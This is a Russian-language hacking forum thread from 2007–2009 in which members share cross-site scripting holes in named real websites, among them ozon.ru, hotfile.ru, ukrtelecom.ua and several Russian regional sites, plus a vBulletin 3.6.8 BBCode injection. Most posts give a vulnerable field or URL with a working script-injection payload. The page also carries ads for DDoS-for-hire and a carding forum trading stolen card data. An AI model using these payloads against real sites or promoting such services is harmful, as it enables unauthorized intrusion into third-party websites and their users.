Новые сообщенияНовые сообщения
TRUST DDOS
[Рекомендую]
ОТКЛЮЧИТЬ САЙТ ! ЗАКАЗАТЬ DDOS ! DDOS SERVICE!
CARDER.PRO - CARDING FORUM. DUMPS, CCs, DROPs - MANY PRIVATE SERVICE! CARDERS FORUM №1. REGISTRATION - 33 LR.
Advertise Реклама на форуме

Ответ
 
Опции темы Опции просмотра

Активные XSS

Старый 02.08.2007, 03:38   #1 (permalink)
Администратор
 
Аватар для Isis
 
Isis вне форума
Регистрация: 19.05.2007
Сообщений: 1,000
Репутация: 734
ICQ: 22222208
Exclamation Активные XSS

В этой теме выкладываем только активные XSS
  Ответить с цитированием

Рекламные ссылки:

Старый 02.08.2007, 03:38   #2 (permalink)
Администратор
 
Аватар для Isis
 
Isis вне форума
Регистрация: 19.05.2007
Сообщений: 1,000
Репутация: 734
ICQ: 22222208
По умолчанию

www.hotfile.ru
Закачиваем файл любой, в поле "Описание" суем наш зловредный код.
В данном случае
Код:
'"/><script>alert(/xss/)</script>
Получаем линк на скачивание, смотрим - активная хсс
Пример - http://www.hotfile.ru/52377/
  Ответить с цитированием

Старый 18.09.2007, 11:24   #3 (permalink)
Junior Member
 
Klaus Doring вне форума
Регистрация: 17.09.2007
Сообщений: 8
Репутация: 10
ICQ: 466543412
По умолчанию

Код:
https://db.raid.ru/cgi-bin/ppo/excells/%3Cscript%3Ealert(587385376)</script>
Мой второй XSS
А вот первый
Код:
  http://perm.citydom.ru/index?acuparam=>"><ScRiPt>alert(1600688950)</ScRiPt>
  Ответить с цитированием

Старый 19.09.2007, 20:09   #4 (permalink)
Администратор
 
Аватар для Isis
 
Isis вне форума
Регистрация: 19.05.2007
Сообщений: 1,000
Репутация: 734
ICQ: 22222208
По умолчанию

Klaus Doring, это не активные xss, а пассивные

http://paste.zloy.org/ вот активка
  Ответить с цитированием

Active XSS vBulletin 3.6.8
Старый 19.10.2007, 21:11   #5 (permalink)
Администратор
 
Аватар для Isis
 
Isis вне форума
Регистрация: 19.05.2007
Сообщений: 1,000
Репутация: 734
ICQ: 22222208
Exclamation Active XSS vBulletin 3.6.8

Активка в булке 3.6.8
Автор: я =)

Код:
[img*]\"'/><script>alert(/xss/)</script>[/img]
  Ответить с цитированием

Старый 17.11.2007, 15:32   #6 (permalink)
Junior Member
 
Аватар для K1nD[e]R
 
K1nD[e]R вне форума
Регистрация: 04.10.2007
Сообщений: 23
Репутация: 68
ICQ: 911315
По умолчанию

http://www.abc.times.lv/
Вставляем: :
Код:
"><script>alert('xss')</script>
  Ответить с цитированием

Старый 30.06.2008, 14:53   #7 (permalink)
Новичок
 
it's my вне форума
Регистрация: 09.11.2007
Адрес: хакир!!111
Сообщений: 5
Репутация: 42
По умолчанию

ozon.ru
В отзыве на товар, уязвимое поле Страна/город. Недостаток в том, что нужно ждать два/три дня пока отзыв отправится в паблик.
Пример: http://www.ozon.ru/context/detail/id/3819533/
Код:
<td colspan="3" align="right" class="vertpadd" 
style="padding-right:20px; color:Gray;">Мамедов&nbsp;
(<a href=/context/client_opinion/ClientGuid/9596607c-384f-4f1e-a17f-ac49e92840c4/>все отзывы</a>), 
Москва<fuck>, 21 год
        </td>
  Ответить с цитированием

Старый 19.12.2008, 18:19   #8 (permalink)
Местный
 
Аватар для f02
 
f02 вне форума
Регистрация: 11.05.2008
Сообщений: 391
Репутация: 695
По умолчанию

пример:
Код:
http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
хсска в логине.
__________________
PHP код:
Isis 
  Ответить с цитированием

Старый 19.06.2009, 18:56   #9 (permalink)
Новичок
 
Azam вне форума
Регистрация: 19.06.2009
Сообщений: 5
Репутация: 0
По умолчанию

объясните что такое хсс и как с ним работать!
  Ответить с цитированием

Старый 04.07.2009, 00:13   #10 (permalink)
Новичок
 
Аватар для Melk
 
Melk вне форума
Регистрация: 03.07.2009
Сообщений: 6
Репутация: 4
По умолчанию

УкрТелеком
Код:
http://ukrtelecom.ua/webparts/feedback
Все поля...

Последний раз редактировалось Melk; 04.07.2009 в 00:15..
  Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Выкл.
Pingbacks are Выкл.
Refbacks are Выкл.



Друзья форума: kidala.info, hack-sell.com, Brute.Name, Секреты ВКонтакте, EXPHack.org, База IP диапазонов
Ваша ссылка может быть здесь если вашему сайту/форуму более 3х месяцев. ICQ 22222208